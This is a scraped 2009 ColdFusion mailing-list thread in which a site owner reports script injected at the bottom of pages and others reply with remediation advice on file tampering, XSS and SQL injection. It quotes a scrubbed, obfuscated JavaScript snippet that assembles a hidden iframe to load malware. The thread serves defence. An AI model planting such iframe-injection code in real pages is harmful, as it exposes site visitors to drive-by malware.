index.cfm). The script (which > has been scrubbed) looks like > this: > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321365 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Do a search on this list for 'exec('
There was a big todo about this last summer. Probably in your database
-Original Message-
From: Nick Gleason
Sent: Monday, April 06, 2009 2:19 PM
To: cf-talk
Subject: Question about hack
Hi there. We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.
The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:
<!--
var applstrna0 = "<if";
var applstrna1 = "rame src=<a rel="nofollow" href="http://said7"">http://said7"</a>;;
var applstrna2 = ".[BAD URL HERE]";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//-->
The script downloads malware, which we obviously want to prevent. We're
trying to determine how it's getting in their, whether through an old site
with inadequate code or the OS or something else. Any thoughts?
This is on a server running IIS 6 / CF7.
Thanks in advance,
Nick
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;207172674;29440083;f
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321362
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Is the malicious string in the actual index.cfm page on the server, or is it being output on the page when CF processes it as part of a variable from the form/url or database? If the actual files on your web server have been modified, change all your FTP and remote admin passwords immediately and run an antivirus scan. Also, check your FTP logs, and date/time modified on the files to determine when and how they were modified. Run an extended find a replaced to clean your .cfm files. If the string is being appended into a url or form field and then output on the page, htmleditformat or jsstringformat all user-entered data and read up on XSS attacks. If the string has been appended into your database variables and is being output on the page that way, look for un paramaterized SQL statements, run a queryparam scanner, change your SQL Server login passwords, and read up on SQL injection attacks. Update your database to remove the malicious values. ~Brad Original Message Subject: Question about hack From: "Nick Gleason" Date: Mon, April 06, 2009 1:19 pm To: cf-talk Hi there. We've just seen a hack attempt that we haven't seen before and I wanted to get feedback. The symptom is that some script code is inserted at the bottom of certain pages (e.g. index.cfm). The script (which has been scrubbed) looks like this: ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321361 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Question about hack
Hi there. We've just seen a hack attempt that we haven't seen before and I wanted to get feedback. The symptom is that some script code is inserted at the bottom of certain pages (e.g. index.cfm). The script (which has been scrubbed) looks like this: The script downloads malware, which we obviously want to prevent. We're trying to determine how it's getting in their, whether through an old site with inadequate code or the OS or something else. Any thoughts? This is on a server running IIS 6 / CF7. Thanks in advance, Nick ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321353 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
